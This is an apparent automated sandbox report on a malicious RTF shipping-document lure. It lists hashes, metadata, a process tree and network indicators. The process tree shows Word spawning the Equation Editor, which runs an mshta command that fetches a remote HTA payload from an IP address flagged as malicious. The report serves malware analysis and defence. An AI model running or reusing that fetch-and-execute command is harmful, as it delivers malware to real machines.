File name: | SHIPPING DOC.doc |
Full analysis: | https://app.any.run/tasks/ff56b4bc-e80a-4667-901b-326d468db156 |
Verdict: | Malicious activity |
Analysis date: | October 14, 2019, 07:29:13 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | DF698925DB142720CF084D04147DB4AA |
SHA1: | 18F9799E33EA07BB601CCC2859749AA49E5502C9 |
SHA256: | 33CFB0DB524658139AC16254863AD48C9F4783D7FF0FEC2E88F2B1EF227249CD |
SSDEEP: | 768:qxrBqbeW6HHkXzD7p2og7PPPPPhPPPPPgPPPPP6IozoR8oVojrc9YU:qqbxqoWPcKU |
.rtf | | | Rich Text Format (100) |
---|
InternalVersionNumber: | 95 |
---|---|
CharactersWithSpaces: | - |
Characters: | - |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
RevisionNumber: | 1 |
ModifyDate: | 2019:10:07 21:04:00 |
CreateDate: | 2019:10:07 21:04:00 |
LastModifiedBy: | FireSecIT |
Author: | FireSecIT |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1296 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\SHIPPING DOC.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
460 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2084 | MsHTa http://103.207.38.15:1010/hta &AAAAAAAC | C:\Windows\system32\MsHTa.exe | EQNEDT32.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Version: 8.00.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA7F2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D3E45E9E34C71A48C10FD945E9620BAF | SHA256:6CC7603DD408465CD9F4E0ED479443E49C34BDBCC43DE9FD1A9A1A1B8185537F | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$IPPING DOC.doc.rtf | pgc | |
MD5:E3F608358FE7EDD4C89899EDFE26CBDA | SHA256:9B2F124CDAC983BAA83274DC29462C6B4BC8B012AFB61CA039E930FE71A1D2AD | |||
1296 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA0A92F1.wmf | wmf | |
MD5:A53FF3B2B74B0493CD2DD5351BCB2760 | SHA256:AC5F55A119B8894F347A6E85328D4A1E7BA350E0D4EA98CE1D3B2F95FAECB5F2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2084 | MsHTa.exe | GET | — | 103.207.38.15:1010 | http://103.207.38.15:1010/hta | VN | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2084 | MsHTa.exe | 103.207.38.15:1010 | — | VNPT Corp | VN | malicious |
PID | Process | Class | Message |
---|---|---|---|
2084 | MsHTa.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |